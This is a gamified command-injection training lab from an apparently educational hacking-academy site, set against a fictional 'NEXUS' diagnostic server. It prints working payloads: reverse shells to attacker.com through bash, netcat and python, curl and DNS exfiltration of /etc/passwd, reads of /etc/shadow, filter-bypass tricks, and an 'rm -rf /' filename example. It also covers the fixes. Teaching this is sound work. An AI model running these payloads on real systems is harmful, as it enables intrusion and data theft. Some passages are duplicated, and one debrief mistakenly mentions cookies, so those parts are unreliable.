«
‹
HACKAACADEMY
OP-06 // OPERATION SHELL STORM // COMMAND INJECTION
0
XP
R1
RANK
0%
DETECT
↻
RESET
CAMPAIGN 3 — OPERATION SHELL STORM
OS INJECTION // TARGET: NEXUS DIAGNOSTIC SERVER
06
OWASP TOP 10 #3 — A03:2021
COMMAND INJECTION
OS SHELL INJECTION // BLIND EXECUTION // SERVER TAKEOVER
OPERATION SHELL STORM
📡
SITUATION REPORT
CLASSIFIEDThe Syndicate runs a server diagnostic tool on its Kyiv relay node — a web interface that lets operatives ping IP addresses to check that the cell's burner infrastructure is still alive. You type an IP. The server runs
COMMANDER, the tool's developer, threw it together fast under deadline. He passed the user's input directly into the shell command without checking it. He assumed users would only type IP addresses.
He was wrong. The shell separator
ping [your input] and returns the result.COMMANDER, the tool's developer, threw it together fast under deadline. He passed the user's input directly into the shell command without checking it. He assumed users would only type IP addresses.
He was wrong. The shell separator
; lets you chain commands. Type 8.8.8.8; whoami — the server pings 8.8.8.8, then runs whoami. Both outputs come back. The server is now running whatever we tell it.THE MICROPHONE THAT REPLAYS EVERYTHING
10-YEAR-OLD LEVEL
Imagine a receptionist who forwards every request directly into a control system inside a building. Whatever you say is passed exactly as received. At first, this works for normal requests.
But there is a hidden problem. The system does not understand the difference between a normal request and hidden instructions embedded inside the request.
Now imagine someone submits a request that looks harmless on the surface, but contains hidden instructions meant to change how the system behaves. The receptionist passes everything through. And the system begins performing actions that were never intended.
But there is a hidden problem. The system does not understand the difference between a normal request and hidden instructions embedded inside the request.
Now imagine someone submits a request that looks harmless on the surface, but contains hidden instructions meant to change how the system behaves. The receptionist passes everything through. And the system begins performing actions that were never intended.
If the server passes your input directly to the OS shell — what character could you type after an IP address to make the server run a second command of your choice?
INTERCEPTED — COMMANDER COMMS
14:33 UTC
COMMANDER
"My tool only takes IP addresses. The
ping prefix is hardcoded — operatives can only ever append to it. Nothing but a ping runs on that box."MENDAX
Shadow — the shell doesn't respect his prefix, it reads the whole line. A semicolon ends the ping and opens a command of our own. COMMANDER thinks he's handing out a ping button. He's handing us his Kyiv server.
▶ MISSION OBJECTIVES
01
TARGET: The NEXUS diagnostic tool at nexus.int — a /diag endpoint that drops your raw input straight into a shell
ping -c 4 [input]02
INJECT: Chain a second command past the ping with a shell separator — run
whoami / id on the server and pull back its intelligence03
SWEEP: Classify NEXUS inputs — flag which ones reach a shell and are injectable, and which are safely handled
04
WIN: Land your injected command, then lock it down — never pass raw input to a shell; use a safe argument array instead
⚖️
ETHICAL NOTICE: Command injection is covered by CEH, OSCP, and every cybersecurity certification. All interactions here are simulated against fictional infrastructure. Never use these techniques on real systems without explicit written authorisation.
🔧 UNDER THE HOOD▼
THE ATTACK — STEP BY STEP
Command injection happens when user input is passed to a shell. If the app runs
ping <host>, append a shell operator to chain your own command:// Input field: enter an IP to ping
// Payload:
8.8.8.8; id
8.8.8.8 && cat /etc/passwd
8.8.8.8 | whoami
// Subshell execution:
8.8.8.8 $(cat /etc/shadow)
8.8.8.8 `id`
Reverse shell — get interactive access to the server:// Input payload:
8.8.8.8; bash -i >& /dev/tcp/attacker.com/4444 0>&1
// Netcat listener on attacker machine:
nc -lvnp 4444
Blind injection — no output visible, but you can infer execution via time delay:8.8.8.8; sleep 5
COMMON VARIATIONS
1. Out-of-band (OOB) via DNS — exfiltrate data through DNS queries when output is blocked:
; nslookup $(whoami).attacker.com
; curl http://attacker.com/?data=$(cat /etc/passwd | base64)
2. Netcat reverse shell variants — for systems without bash TCP:; nc attacker.com 4444 -e /bin/sh
; python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("attacker.com",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh"])'
3. Filter bypass — if semicolons are blocked, try alternatives:%0a id (URL-encoded newline)
${IFS}id (IFS instead of space)
{id} (brace groups)
HOW TO DEFEND
Never pass user input to a shell. Use language APIs that take arrays — no shell expansion occurs:
// Node.js — WRONG (shell injection possible):
exec('ping ' + userInput, callback);
// Node.js — RIGHT (array form, no shell):
execFile('ping', ['-c', '1', userInput], callback);
// Python — WRONG:
os.system('ping ' + user_input)
// Python — RIGHT:
subprocess.run(['ping', '-c', '1', user_input])
If you absolutely must call a shell, allowlist the permitted values — don't try to blacklist dangerous characters:const allowed = /^[0-9a-zA-Z.\-]+$/;
if (!allowed.test(userInput)) throw new Error('Invalid input');
TARGET
nexus-diag.ghost-capital.int
IP ADDRESS
10.47.0.66
OS / WEB SERVER
Ubuntu 22.04 · nginx/1.18.0
KEY SERVICES
PHP/7.4.28 · /diag/network endpoint
ATTACK SCOPE
/diag/network?host=* — OS command execution in scope
ATTACKER NODE
shadow@sigma9 · 10.99.0.1
📋 ROOM TASKS
01
✓
Understand how semicolons break shell strings
02
▶
Inject OS commands through the diagnostic tool
03
○
Classify injectable vs safe command patterns
04
○
Identify the argument-array fix
05
○
Submit the capture-the-flag token
CAPTURE THE FLAG
Complete the exploit lab. The flag appears in the terminal output. Copy and submit it here for +50 XP.
PHASE 01
INJECT THE COMMAND
EXPLOIT
MENDAX
ENCRYPTED
You typed
The tool was only meant to run:
But the server passes your input straight to the shell — and the shell treats a semicolon as "end this command, start the next one." Whatever you put after it runs too.
You just chained a command onto their ping. Now make the call: which payload smuggles your second command past the shell?
8.8.8.8; whoami into the NEXUS diagnostic tool — and the server didn't just ping. It pinged, then ran whoami and handed you back its own username. Your second command executed on their box.The tool was only meant to run:
ping -c 4 [input]But the server passes your input straight to the shell — and the shell treats a semicolon as "end this command, start the next one." Whatever you put after it runs too.
You just chained a command onto their ping. Now make the call: which payload smuggles your second command past the shell?
MENDAX — HOW THIS IS ACTUALLY DONE
LIVE
MENDAX
Watch the real mechanics — this is standard testing against a fictional, authorised target. First I confirm the box even talks to a shell. I send a harmless probe: a real IP, then a semicolon, then a tiny command the shell will run if it's vulnerable:
$ curl "https://nexus.int/diag?ip=8.8.8.8;id"
# the server runs: ping -c 4 8.8.8.8 ; id
PING 8.8.8.8 ... 4 packets received
uid=33(www-data) gid=33(www-data)
MENDAX
That
uid=www-data line should never appear after a ping. The semicolon ended the ping and the shell happily ran id too. That's confirmed command injection — and the fix is to never hand raw input to a shell. First, you pick the character that does it.▶ PICK THE INJECTION PAYLOAD
💡 MENDAX — HINT (−20 XP)
The shell has special characters that separate commands. One runs the second command only if the first succeeded. One pipes output from one command to another. One always runs the second command regardless. Which option uses the unconditional separator?
✓
COMMAND INJECTION MECHANISM UNDERSTOOD
The shell is a language. When the server passes your input to the shell, the shell reads the entire string — including any special characters you added. The semicolon
In simple terms: The server wrote a note saying "ping this IP." You added "; whoami" to the note before it was sent. The server read the whole note to the shell. The shell ran both parts. It does not question the note — it just obeys it.
COMMANDER built a tool that trusts the note. We rewrote it.
; is the shell's "end of command" separator. Everything after it is a new command.In simple terms: The server wrote a note saying "ping this IP." You added "; whoami" to the note before it was sent. The server read the whole note to the shell. The shell ran both parts. It does not question the note — it just obeys it.
COMMANDER built a tool that trusts the note. We rewrote it.
Real-world impact: Shellshock (CVE-2014-6271, CVSS 10.0) — a command injection vulnerability in Bash affected hundreds of millions of servers. Attackers sent malicious HTTP headers that contained shell commands. Every server running CGI scripts executed them automatically.
PHASE 02
SHELL INJECTION — BUILD THE ATTACK PAYLOAD
TERMINAL
The injection point is confirmed. Now build the full payload — IP, separator, command — and fire it at the NEXUS diagnostic tool. Watch the server run your instructions.
MENDAX
ENCRYPTED
The NEXUS diagnostic tool is live. It accepts an IP address and runs
Think of the school PA system — the headmaster reads whatever is on the note. We are going to write extra instructions after the IP address, separated by a semicolon. The server will read the whole note to the shell.
Build your injection payload step by step below — select the IP, the separator, then the command you want to run. Watch the full payload assemble, then fire it at the server.
ping -c 4 [input].Think of the school PA system — the headmaster reads whatever is on the note. We are going to write extra instructions after the IP address, separated by a semicolon. The server will read the whole note to the shell.
Build your injection payload step by step below — select the IP, the separator, then the command you want to run. Watch the full payload assemble, then fire it at the server.
MISSION OBJECTIVEBuild a valid injection payload using the three-part selector below. Chain a shell separator after the IP, then append your command. When the full payload assembles correctly, fire it at the NEXUS diagnostic endpoint.
▶ BUILD YOUR INJECTION PAYLOAD — SELECT EACH PART
LEAVE MISSION?
Progress is saved. You can resume from the mission select screen at any time.
RESET MISSION?
This wipes all progress for this operation only. XP in other operations is unaffected.
ARE YOU SURE?
Final confirmation -- all progress for this operation will be permanently erased.
💡 MENDAX — ACTIVE HINT
Three steps — one correct each. Step 1: Pick an IP that always responds. Step 2: Which separator runs the next command unconditionally — even if ping fails? Step 3: MENDAX needs both the server user and running processes — which command gives both?
✓
SHELL ACCESS CONFIRMED — NEXUS SERVER COMPROMISED
The server ran our command. We know: the web server runs as
Simple version: We wrote extra instructions after the IP address. The headmaster read the whole note to the shell. The shell ran everything — ping, then our commands. COMMANDER never saw it coming.
Why this is so dangerous: Command injection gives direct OS access — not just web app access. Every file on the server, every service, every credential stored anywhere on the machine is now reachable.
www-data, MySQL is on the same host, and the Python app path is exposed. From here we could read config files, extract database credentials, or escalate to root.Simple version: We wrote extra instructions after the IP address. The headmaster read the whole note to the shell. The shell ran everything — ping, then our commands. COMMANDER never saw it coming.
Why this is so dangerous: Command injection gives direct OS access — not just web app access. Every file on the server, every service, every credential stored anywhere on the machine is now reachable.
Real impact: Shellshock (CVE-2014-6271, CVSS 10.0) — command injection in Bash via HTTP headers. Hundreds of millions of web servers were vulnerable. Attackers ran arbitrary commands on unpatched servers within hours of disclosure.
PHASE 03
CLASSIFY THE INPUTS — COMMAND INJECTION RISK OR SAFE?
TAP & SORT
The attack is done. Before locking it down, map the surface — not every input reaches a shell. Defenders need to know which ones do.
MENDAX
ENCRYPTED
SCRIBE is reviewing input fields across NEXUS's admin tools — trying to identify which ones are command injection risks and which are genuinely safe.
MENDAX: "Shadow — classify each input. Tap it, then mark it CMDI RISK if the value gets handed to a system shell command, or SAFE if it never leaves the application layer."
The test: does this input get passed as an argument to a shell tool — ping, traceroute, a file converter, a DNS lookup — where the OS itself parses it? If yes and there's no argument-array separation, it's a CMDI risk. If it's a username, a comment, a search term, or a UI preference that never touches a shell — safe.
Get them all right to proceed.
MENDAX: "Shadow — classify each input. Tap it, then mark it CMDI RISK if the value gets handed to a system shell command, or SAFE if it never leaves the application layer."
The test: does this input get passed as an argument to a shell tool — ping, traceroute, a file converter, a DNS lookup — where the OS itself parses it? If yes and there's no argument-array separation, it's a CMDI risk. If it's a username, a comment, a search term, or a UI preference that never touches a shell — safe.
Get them all right to proceed.
▶ TAP AN INPUT — THEN TAP A BUCKET
Tap an input chip to select it, then tap SAFE or DANGEROUS to classify it.
⚠ CMDI RISK
✓ SAFE
✓
ALL INPUTS CLASSIFIED — COMMAND INJECTION SURFACE MAPPED
Perfect classification. You can now identify command injection attack surfaces on sight.
Simple rule: Any input that reaches a shell command, OS function, or system utility is a command injection risk. Inputs that only reach a database (SQL) or get rendered as text cannot execute shell commands — they have their own vulnerabilities, but not this one.
The danger inputs: ping tools, DNS lookup tools, traceroute tools, file converters, archive extractors, image processors — any tool that wraps an OS command.
Simple rule: Any input that reaches a shell command, OS function, or system utility is a command injection risk. Inputs that only reach a database (SQL) or get rendered as text cannot execute shell commands — they have their own vulnerabilities, but not this one.
The danger inputs: ping tools, DNS lookup tools, traceroute tools, file converters, archive extractors, image processors — any tool that wraps an OS command.
Why file converters are high risk: Many file converters call tools like
ffmpeg, convert, or ghostscript with the filename as input. A filename containing ; rm -rf / can be catastrophic if passed unsanitised to the shell.PHASE 04
THE FIX — CLOSE THE DOOR
DEFENSE
Every attack has a defense. The shell ran our commands because the app concatenated our input into a shell string. One architectural change eliminates this class of vulnerability permanently.
MENDAX — DEBRIEF
FINAL PHASE
GHOST is being brought in. USD 50,000 recovered.
MENDAX: "Shadow — debrief question. NEXUS's development team is patching the portal right now. Which single fix would have stopped the entire attack? The browser behaviour cannot be changed — we can't stop cookies from being sent automatically. The fix has to be on the server side."
MENDAX: "Shadow — debrief question. NEXUS's development team is patching the portal right now. Which single fix would have stopped the entire attack? The browser behaviour cannot be changed — we can't stop cookies from being sent automatically. The fix has to be on the server side."
▶ WHICH FIX STOPS COMMAND INJECTION?
💡 MENDAX — HINT (−20 XP)
Think about WHY the attack worked: our input was mixed directly into a shell command string. The fix separates our input from the command structure so that shell characters in our input never reach the shell interpreter. Which option does that — without removing the ping functionality?
► INTEL — OP-06 // OPERATION SHELL STORM
TARGET: NEXUS Network Admin Panel
Classification: TOP SECRET // Campaign 3 Ghost Protocol
MENDAX — CHANNEL BRIEFING
PRE-OP
MENDAX
The ping diagnostic tool calls ping with the hostname directly: exec('ping -c 4 ' + userInput). Semicolons and pipe characters are not filtered.
📓
OWASP CLASSIFICATION
INTELA03:2021 — OS command injection occurs when user input is passed to a shell function without proper sanitisation. Impact: full server compromise, data exfiltration, lateral movement.
⚖
GLOSSARY TERMS: Command Injection, OS Injection, Shell Injection, RCE, Remote Code Execution, exec(). All terms auto-logged to your Field Manual as you encounter them.
▶ ACADEMY — COMMAND INJECTION
THE SERVER RUNS COMMANDS FOR YOU.
COMMAND INJECTION MAKES IT RUN YOURS.
COMMAND INJECTION MAKES IT RUN YOURS.
Three levels of depth — start at Beginner, go as deep as you want.
BEGINNER
What Is Command Injection?
›
Command injection happens when an application passes user input to a system shell or OS command without sanitising it first. The shell treats the entire string as a command — including any special characters the attacker added.
Here is how it feels: a web tool lets you ping an IP. You type
The two things that make command injection possible:
• User input reaches a shell command, OS function, or system call
• The input is not validated — shell characters are passed through unchanged
Here is how it feels: a web tool lets you ping an IP. You type
8.8.8.8; cat /etc/passwd. The server runs ping -c 4 8.8.8.8; cat /etc/passwd. You get the ping results — and the server's user list.The two things that make command injection possible:
• User input reaches a shell command, OS function, or system call
• The input is not validated — shell characters are passed through unchanged
Real world: Shellshock (CVE-2014-6271, CVSS 10.0, 2014) — a command injection flaw in the Bash shell. Attackers sent malicious HTTP headers containing shell commands. Every vulnerable web server using CGI executed them. Hundreds of millions of servers affected within hours of disclosure.
INTERMEDIATE
Injection Techniques
›
Basic injection (semicolon):
Chaining (AND):
Subshell injection:
Blind injection via time delay:
Out-of-band data exfiltration:
The server makes an outbound HTTP request with command output in the URL. You receive it on your server's logs — even if nothing is shown in the app's response.
Filter bypass techniques:
• Space: use
• Semicolon blocked: try newline
• Characters encoded: URL encode
8.8.8.8; whoami — runs whoami after ping unconditionallyChaining (AND):
8.8.8.8 && cat /etc/passwd — only runs if ping succeedsSubshell injection:
8.8.8.8; $(cat /etc/shadow) — embeds command output inlineBlind injection via time delay:
8.8.8.8; sleep 5 — if page takes 5 extra seconds → injection confirmedOut-of-band data exfiltration:
8.8.8.8; curl http://attacker.com/$(whoami)The server makes an outbound HTTP request with command output in the URL. You receive it on your server's logs — even if nothing is shown in the app's response.
Filter bypass techniques:
• Space: use
${IFS} or tab instead• Semicolon blocked: try newline
%0a• Characters encoded: URL encode
%3B for ;
EXPERT
Defences & CVEs
›
Primary defence — allowlist input validation:
Reject any input that does not match a strict allowlist pattern. For IP:
Parameterised system calls:
Use language APIs that separate the command from arguments. In Python:
Principle of least privilege:
Run the web server process as a low-privilege user. If injection occurs — attacker gets www-data, not root. Cannot write to system files. Cannot install services. Limits blast radius significantly.
Notable CVEs:
• CVE-2014-6271 — Shellshock, Bash, CVSS 10.0. Affected all CGI web servers
• CVE-2021-44228 — Log4Shell, JNDI injection (command injection via logging)
• CVE-2022-42889 — Text4Shell, Apache Commons Text, template injection → RCE
Reject any input that does not match a strict allowlist pattern. For IP:
/^(\d{1,3}\.){3}\d{1,3}$/. For hostname: letters, numbers, hyphens, dots only. Anything else: reject before the command is built.Parameterised system calls:
Use language APIs that separate the command from arguments. In Python:
subprocess.run(['ping', '-c', '4', user_ip]) — the shell is never invoked. The arguments cannot contain shell separators because there is no shell to interpret them.Principle of least privilege:
Run the web server process as a low-privilege user. If injection occurs — attacker gets www-data, not root. Cannot write to system files. Cannot install services. Limits blast radius significantly.
Notable CVEs:
• CVE-2014-6271 — Shellshock, Bash, CVSS 10.0. Affected all CGI web servers
• CVE-2021-44228 — Log4Shell, JNDI injection (command injection via logging)
• CVE-2022-42889 — Text4Shell, Apache Commons Text, template injection → RCE
Log4Shell (CVE-2021-44228, CVSS 10.0): A command injection vulnerability in the Java logging library Log4j. Attackers sent a single malicious string in an HTTP header. The logger fetched and executed remote code. Over 3 billion Java installations were affected. Patching took months across enterprise systems.
▶ REAL-WORLD TOOLS — COMMAND INJECTION
WHAT PROFESSIONALS USE
Every tool here is free, legal, and used in real penetration tests.
🔎
Burp Suite — Intruder
FREE TIER
Fuzz injection points with a command injection payload list. Mark the vulnerable parameter in Intruder, load a wordlist of shell separators and payloads, fire — review responses for command output or unusual lengths.
Send to Intruder → Add § around parameter → Load cmdi-payloads.txt → Attack
💉
Commix
FREE / OPEN SOURCE
Automated command injection and exploitation tool. Detects and exploits both classic and blind command injection across GET, POST, cookie, and header parameters. Handles filter bypass automatically.
python3 commix.py -u "http://target/ping?ip=INJECT*"
🌊
OWASP ZAP — Active Scan
FREE / OPEN SOURCE
ZAP's active scanner tests for command injection by fuzzing parameters with known payloads. Passive scan flags server error responses and unusual timing that suggest blind injection.
Active Scan → Injection → Command Injection → View alerts
🐍
Interactsh (Burp Collaborator alternative)
FREE / OPEN SOURCE
Out-of-band interaction server. Inject a payload that makes the server send a DNS or HTTP request to your Interactsh URL. Confirms blind command injection without needing visible output.
interactsh-client → get URL → inject: curl http://your.url/$(whoami)